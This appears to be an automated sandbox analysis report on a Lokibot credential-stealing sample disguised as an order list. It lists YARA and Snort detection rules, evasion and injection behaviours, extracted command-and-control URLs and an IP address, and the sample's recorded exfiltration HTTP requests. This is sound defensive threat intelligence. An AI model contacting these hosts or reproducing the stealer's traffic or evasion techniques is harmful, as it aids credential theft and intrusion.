Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER LIST790.exe

Overview

General Information

Sample Name:ORDER LIST790.exe
Analysis ID:682143
MD5:80e4b72d26806ed5f245142166a48145
SHA1:c07deb8c6fc551636d842c18d0540594afbe1c68
SHA256:c5847da2de3c9aee81dc121287bb4c4c366d8c978f604cac6e19f80da1a46094
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Lokibot
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • ORDER LIST790.exe (PID: 980 cmdline: "C:\Users\user\Desktop\ORDER LIST790.exe" MD5: 80E4B72D26806ED5F245142166A48145)
    • ORDER LIST790.exe (PID: 1672 cmdline: C:\Users\user\Desktop\ORDER LIST790.exe MD5: 80E4B72D26806ED5F245142166A48145)
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://66.29.145.162/?112233"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
        • 0x17658:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
        00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
        • 0x4a23:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
        Click to see the 26 entries
        SourceRuleDescriptionAuthorStrings
        0.2.ORDER LIST790.exe.4726268.9.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13278:$s1: http://
        • 0x16233:$s1: http://
        • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x13280:$s2: https://
        • 0x13278:$f1: http://
        • 0x16233:$f1: http://
        • 0x13280:$f2: https://
        0.2.ORDER LIST790.exe.4726268.9.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          0.2.ORDER LIST790.exe.4726268.9.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          0.2.ORDER LIST790.exe.4726268.9.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          0.2.ORDER LIST790.exe.4726268.9.unpackLoki_1Loki Payloadkevoreilly
          • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
          • 0x133fc:$a2: last_compatible_version
          Click to see the 61 entries
          No Sigma rule has matched
          Timestamp:192.168.2.366.29.145.16249741802024317 08/11/22-05:37:23.228158
          SID:2024317
          Source Port:49741
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.366.29.145.16249743802024318 08/11/22-05:37:28.256446
          SID:2024318
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.366.29.145.16249742802024312 08/11/22-05:37:26.351786
          SID:2024312
          Source Port:49742
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.366.29.145.16249742802021641 08/11/22-05:37:26.351786
          SID:2021641
          Source Port:49742
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.366.29.145.16249743802024313 08/11/22-05:37:28.256446
          SID:2024313
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.366.29.145.16249742802024317 08/11/22-05:37:26.351786
          SID:2024317
          Source Port:49742
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.366.29.145.16249741802024312 08/11/22-05:37:23.228158
          SID:2024312
          Source Port:49741
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.366.29.145.16249741802021641 08/11/22-05:37:23.228158
          SID:2021641
          Source Port:49741
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.366.29.145.16249743802021641 08/11/22-05:37:28.256446
          SID:2021641
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results
          Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://66.29.145.162/?112233"]}
          Source: ORDER LIST790.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: ORDER LIST790.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Networking

          barindex
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49741 -> 66.29.145.162:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49741 -> 66.29.145.162:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49741 -> 66.29.145.162:80
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 66.29.145.162:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 66.29.145.162:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49742 -> 66.29.145.162:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 66.29.145.162:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 66.29.145.162:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49743 -> 66.29.145.162:80
          Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
          Source: Malware configuration extractorURLs: http://66.29.145.162/?112233
          Source: Joe Sandbox ViewASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
          Source: Joe Sandbox ViewIP Address: 66.29.145.162 66.29.145.162
          Source: global trafficHTTP traffic detected: POST /?112233 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 66.29.145.162Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6B020D42Content-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: POST /?112233 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 66.29.145.162Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6B020D42Content-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: POST /?112233 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 66.29.145.162Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6B020D42Content-Length: 163Connection: close
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: unknownTCP traffic detected without corresponding DNS query: 66.29.145.162
          Source: ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org
          Source: ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://centos.org
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://httpd.apache.org/
          Source: ORDER LIST790.exeString found in binary or memory: http://philiphanson.org/medius/book/1.0
          Source: ORDER LIST790.exeString found in binary or memory: http://philiphanson.org/medius/temp-transform
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.centos.org/
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownHTTP traffic detected: POST /?112233 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 66.29.145.162Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6B020D42Content-Length: 190Connection: close
          Source: ORDER LIST790.exe, 00000000.00000002.271014354.0000000001650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          System Summary

          barindex
          Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
          Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
          Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
          Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
          Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
          Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
          Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
          Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
          Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
          Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
          Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: 00000004.00000000.268189869.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
          Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
          Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: Process Memory Space: ORDER LIST790.exe PID: 1672, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
          Source: initial sampleStatic PE information: Filename: ORDER LIST790.exe
          Source: ORDER LIST790.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
          Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
          Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
          Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
          Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
